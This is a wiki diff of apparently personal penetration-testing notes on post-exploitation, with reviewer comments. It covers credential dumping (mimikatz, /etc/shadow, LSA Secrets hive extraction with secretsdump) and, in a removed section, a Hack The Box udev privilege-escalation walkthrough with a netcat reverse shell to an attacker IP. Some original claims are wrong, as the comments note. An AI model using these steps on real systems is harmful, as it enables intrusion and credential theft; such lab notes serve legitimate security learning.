The gMan nixWiki

Because the mind is made of Teflon...

method_5_post-exploitation

Differences

This shows you the differences between two versions of the page.

method_5_post-exploitation [2023/01/12 00:16] gman
method_5_post-exploitation [2023/01/12 00:31] (current) – [First Thing] gman
Line 33: Line 33:
     * Concealment     * Concealment
     * Retain Access     * Retain Access
 +
 +----
 +
 +===== First Thing =====
 +
 +After you've compromised a system, one of the //**first things**// you want to try is acquiring the local credential store (passwords).
 +
 +**Windows:** The go-to tool is ''mimikatz'' (it can read hashes directly from memory).
 +
 +**Linux:** The ''creddump'' package contains...
 +  - ''cachedump'': dumps cashed credentials
 +  - ''lsadump'': dumps LSA Secrets
 +  - ''pwdump'': dumps password hashes
 +
 +Linux passwords are usually found in ''/etc/shadow''.
 +  * You can simply copy that file to your attack machine and crack offline (if you have root).
 +  * Therefore, priv esc is a key part of acquiring credentials.
  
 ---- ----
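Review bot: The "Linux:" label on the creddump paragraph is misleading. creddump (''cachedump'', ''lsadump'', ''pwdump'') runs under Linux, but what it parses is Windows registry hives (SAM, SYSTEM, SECURITY), so it belongs with the Windows credential material, and it needs the boot key from the SYSTEM hive plus the SAM or SECURITY hive as input, not anything from the Linux box itself. In the same list "cashed" should read "cached". For the ''/etc/shadow'' bullets, state the reason the copy-and-crack step needs root: the file is mode 0640 and owned by root:shadow, so an unprivileged shell cannot read it at all, which is exactly why the last bullet's priv esc comes first. It is also worth naming the usual combining step before cracking, ''unshadow /etc/passwd /etc/shadow > hashes.txt'', so the reader knows John wants both files.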
Line 88: Line 105:
   * Check sudo: ''sudo -l'' (if it hangs, it's waiting for a password; kill & reconnect)   * Check sudo: ''sudo -l'' (if it hangs, it's waiting for a password; kill & reconnect)
   * You can also ''find'' backup files (.bak; might have login creds in them) and files owned by root but world readable and/or writable.   * You can also ''find'' backup files (.bak; might have login creds in them) and files owned by root but world readable and/or writable.
- 
----- 
- 
-====== Privilege Escalation ====== 
- 
-===== SUDO ===== 
- 
-''sudo'' is the "super user do" command.  
-  * It allows users to escalate their privileges based on settings in the ''/etc/sudoers'' file. 
-  * When the ''sudo'' command is called, the ''sudoers'' file is checked and rights are granted if they are permitted.  
- 
-Therefore, //**always**// review the ''sudoers'' file after you gain access to a machine. 
-  * Figure out which accounts you want to target based on the rights they have. 
-  * Try to compromise accounts with sudo privilege. 
- 
-One of the first commands you want to execute in order to abuse sudoer rights: ''sudo -l'' 
-  * This will list ("-l" is for "list") the sudoers. 
-  * This shows you the user account names and privileges they have within the sudo environment. 
- 
----- 
- 
-===== SUID ===== 
- 
-**SUID:** Set User ID.  **SGID:** Set Group ID 
-  * These are special bits of a file that tell Linux to run the executable as the owner (SUID) or as the group (SGID) of the file, not as the user who launched it.  
- 
-To find all the files on a system that have the SUID bit set:  
- 
-<code> 
-find / -perm -4000 
-# or 
-find / -perm /4000 
- 
-# To see all the details: 
-find / -perm -u=s -type f 2>/dev/null 
-# or 
-find / -user root -perm -4000 -exec ls -ldb {} \; 
-# note: you need a space between {} and \; 
-</code> 
- 
----- 
- 
-===== udevd ===== 
- 
-If you get a user/daemon shell, you need to escalate your privileges to root. Check udevd... 
- 
-[[https://www.exploit-db.com/search?q=udev|Four local Linux exploits using udevd]] to escalate privileges to root:  
-  - Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation 
-  - Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit) 
-  - Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2) 
-  - Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1) 
- 
-[[https://www.youtube.com/watch?v=DoUZFHwZntY&feature=youtu.be&t=8m40s&ab_channel=rwbnetsec|Walk-Through Video]] described below:  
- 
-On the target machine, see if udev is running:  
- 
-<code>ps ax | grep udevd</code> 
- 
-On the target machine, check the version of udev; run: 
- 
-<code> 
-dkpg -l | grep udev 
-# On HTB Lame I got version 117-8 
-</code> 
- 
-Google the udev version or do a ''searchsploit udev'' and see what comes up. The YouTuber referenced above liked the 8572.c exploit. **Note:** The searchsploit results show a Path that is local in: /usr/share/exploitdb/exploits/... 
- 
-<code> 
--------------------------------------------------------- --------------------------------- 
- Exploit Title                                          |  Path 
--------------------------------------------------------- ---------------------- 
-Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV <  | linux/local/8478.sh 
-Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4 | linux/local/8572.c 
-Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalat | linux/local/41886.c 
-Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege E | linux/local/21848.rb 
--------------------------------------------------------- ---------------------- 
-</code> 
- 
-First, spin up a web server on hour Kali box (your attack machine, your machine) so we can move the exploit over onto the target box:  
- 
-<code>start apache2 service</code> 
- 
-Copy the exploit file over to the web server subdir: 
- 
-<code>cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/</code> 
- 
-Check & Read:  
-  * cd into ''/var/www/html'' and make sure your file is there. Open it up with an editor and look at what it needs to run. 
-  * The Usage section of the file (at the top, scroll down) will tell you how to use the exploit. 
-    * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1]. 
-    * The exploit will execute ''/tmp/run'' (a text file named "run" that lives in the /tmp directory) as root so throw whatever payload you want in there.   
- 
-From your shell over on the target, in the /tmp directory, copy the file from your Kali attack machine onto the target machine using wget: 
- 
-<code>wget 10.10.14.11/8572  # that's the IP of your Kali/attack machine</code> 
- 
-Build your run file on the target, in the /tmp directory. Remember, the /tmp/run file is being used as the payload for the udev exploit. So... build a text file... 
- 
-<code> 
-touch run 
-echo '#!/bin/sh' >> run 
-echo '/bin/netcat -e /bin/sh 10.10.14.11 5555' >> run 
-</code> 
- 
-When the udev exploit runs, it will execute netcat with the reverse shell going to my attack machine 
- 
-You need to compile that .c file you copied to the target machine:  
- 
-<code>gcc 8572.c -o 8572  # name it whatever you want</code> 
- 
-Set up the listener on your Kali (host/attack) machine to catch the shell we're throwing out from the target: 
- 
-<code>nc -nvlp 5555  # make sure it's the same port number</code> 
- 
-Now the listener is waiting for a connection on the Kali attack machine... 
- 
-Run the udev exploit on the target using the netlink socket PID as argv[1]. This creates a reverse shell back to your Kali attack machine. 
- 
-<code>./8572 2687</code> 
- 
-You should have a reverse shell on your Kali machine with root privileges on the target machine. Done. 
  
 ---- ----
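Review bot: This hunk removes the entire Privilege Escalation section (SUDO, SUID, udevd) while the new First Thing section still says "priv esc is a key part of acquiring credentials"; if the section is moving to its own page rather than being retired, the removed span should be replaced with a link to its new location so that reference still resolves. Before the udevd walkthrough lands anywhere else, fix the errors in it: ''dkpg -l | grep udev'' should be ''dpkg -l | grep udev''; ''start apache2 service'' is not a command (''service apache2 start'' or ''systemctl start apache2''); the file copied into ''/var/www/html/'' is ''8572.c'' but the target fetches ''wget 10.10.14.11/8572'', so the two names need to agree; and ''/tmp/run'' is written with ''echo'' but never marked executable, so add ''chmod +x /tmp/run'' before running the exploit, otherwise udev cannot execute the payload. Minor: "hour Kali box" should read "your Kali box", ''touch run'' is redundant given the ''>>'' redirects that follow, and the first two SUID ''find'' commands lack ''2>/dev/null'', so their results will be buried under permission-denied errors.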
Line 337: Line 233:
 ===== Windoze ===== ===== Windoze =====
  
 +==== LSA Secrets Registry ====
 +
 +The **LSA Secrets Registry** contains the password of the currently logged-in user in an encrypted form.
 +  * You can find the LSA Secrets Registry here: ''HKEY_LOCAL_MACHINE/Security/Policy/Secrets''
 +  * You can find the encryption key to the user's password in the parent directory: ''HKEY_LOCAL_MACHINE/Security/Policy''
  
 +So, if you have admin access to the Windows Registry, you can recover the encrypted password and its key fairly easily. 
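Review bot: The opening claim is wrong: LSA Secrets do not hold the password of the currently logged-in user. That user's credentials live in LSASS process memory, which is what mimikatz reads; the Secrets key stores items such as service account passwords (''_SC_<service>''), the machine account password (''$MACHINE.ACC''), the auto-logon ''DefaultPassword'' and the ''DPAPI_SYSTEM'' keys. The paths should use backslashes, ''HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets'', and the key is not simply sitting "in the parent directory": the LSA key under ''HKLM\SECURITY\Policy'' is itself encrypted with the boot key, which is assembled from class values under ''HKLM\SYSTEM\CurrentControlSet\Control\Lsa'', so an attacker needs both hives. The "fairly easily" step should be spelled out: from an elevated prompt run ''reg save HKLM\SECURITY security.save'' and ''reg save HKLM\SYSTEM system.save'', then decrypt offline with impacket's ''secretsdump.py -security security.save -system system.save LOCAL'' or with the ''lsadump'' tool from the creddump package mentioned earlier on this page, which takes the same two hives.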
method_5_post-exploitation.1673482581.txt.gz · Last modified: by gman